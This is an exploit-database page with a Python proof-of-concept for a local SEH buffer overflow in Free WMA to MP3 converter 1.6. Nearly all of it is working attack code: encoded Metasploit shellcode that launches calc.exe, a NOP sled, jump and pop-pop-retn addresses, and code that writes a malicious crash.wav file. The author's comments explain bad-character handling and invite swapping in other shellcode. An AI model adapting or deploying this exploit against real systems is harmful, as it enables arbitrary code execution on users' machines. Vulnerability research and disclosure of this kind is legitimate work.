Free WMA to MP3 converter v1.6 - Local buffer overflow (SEH)



EKU-ID: 2834 CVE: OSVDB-ID:
Author: R3ZN0V Published: 2012-12-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python -w
# In the name of allah
# Title : Local buffer overflow - SEH
# Infected program: [Free WMA to MP3 converter 1.6]
# Date: 30/11/2012
# Exploit Author: [R3ZN0V]
# Software : [www.eusing.com]
# Download Link: [http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm]
# OS's: [Windows xp sp3 , Windows 7 64bit sp1 and 32bit]
# References : http://www.1337day.com/exploit/17433

#=====================================================================================#
# First , i'd like to thank b33f for all his cooperation (always the best man ;) ) .  #
# i suffered soo much until i made this a work exploit ,as well a few problems with   #   
# badchars analyzing and executing my shellcode , which is inside the memory after    #
# tracing badchars , if you looked deeply at the path you'll see a weird thing        #
# is a two byte of 0D will be added automatically like this :                         #
# 09 (0D) 0A 0B 0C (0D) , i've no idea what caused that,first 0D is the problem       #
# Probably like null-byte , however , go to metasploit and figure this out by badchars#
# analyzing , and see try to replace shell to another one using this command :        #
# msfencode -b '\x00\x0a' , obviously it won't work .                                 #
#=====================================================================================#

file = "crash.wav"


# windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -t c <========= 227 byte iteration=1 =========>
shell = ("\xda\xc6\xd9\x74\x24\xf4\x5f\xb8\xc2\x0f\x5e\x65\x33\xc9\xb1"
"\x33\x31\x47\x17\x83\xc7\x04\x03\x85\x1c\xbc\x90\xf5\xcb\xc9"
"\x5b\x05\x0c\xaa\xd2\xe0\x3d\xf8\x81\x61\x6f\xcc\xc2\x27\x9c"
"\xa7\x87\xd3\x17\xc5\x0f\xd4\x90\x60\x76\xdb\x21\x45\xb6\xb7"
"\xe2\xc7\x4a\xc5\x36\x28\x72\x06\x4b\x29\xb3\x7a\xa4\x7b\x6c"
"\xf1\x17\x6c\x19\x47\xa4\x8d\xcd\xcc\x94\xf5\x68\x12\x60\x4c"
"\x72\x42\xd9\xdb\x3c\x7a\x51\x83\x9c\x7b\xb6\xd7\xe1\x32\xb3"
"\x2c\x91\xc5\x15\x7d\x5a\xf4\x59\xd2\x65\x39\x54\x2a\xa1\xfd"
"\x87\x59\xd9\xfe\x3a\x5a\x1a\x7d\xe1\xef\xbf\x25\x62\x57\x64"
"\xd4\xa7\x0e\xef\xda\x0c\x44\xb7\xfe\x93\x89\xc3\xfa\x18\x2c"
"\x04\x8b\x5b\x0b\x80\xd0\x38\x32\x91\xbc\xef\x4b\xc1\x18\x4f"
"\xee\x89\x8a\x84\x88\xd3\xc0\x5b\x18\x6e\xad\x5c\x22\x71\x9d"
"\x34\x13\xfa\x72\x42\xac\x29\x37\xb2\x5d\xe0\xad\x23\xc4\x91"
"\x8c\x29\xf7\x4f\xd2\x57\x74\x7a\xaa\xa3\x64\x0f\xaf\xe8\x22"
"\xe3\xdd\x61\xc7\x03\x72\x81\xc2\x67\x15\x11\x8e\x49\xb0\x91"
"\x35\x96")  


evil = "\x90" * 11 + shell # don't shrink these nops or the exploit wouldn't work , just in case if you replaced the shellcode
junk1 = "\xEB\x06\x90\x90" # jmp 4 byte to far jmp 
junk2 = "\x56\x23\x40\x00" # pop pop retn Wmpcon.exe Rebase=false , aslr=false , seh=unsafe os=false
junk3 = "\xE9\xEA\xEF\xFF\xFF" # jmp back 4108 byte to the beggining of our buffer
junk4 = "C"*50
buffer = evil + "\x41"*(4116-len(evil)) + junk1 + junk2 + junk3 + junk4

text = open(file, "w")
text.write(buffer)
text.close()
print "\t\n The file has been created :) "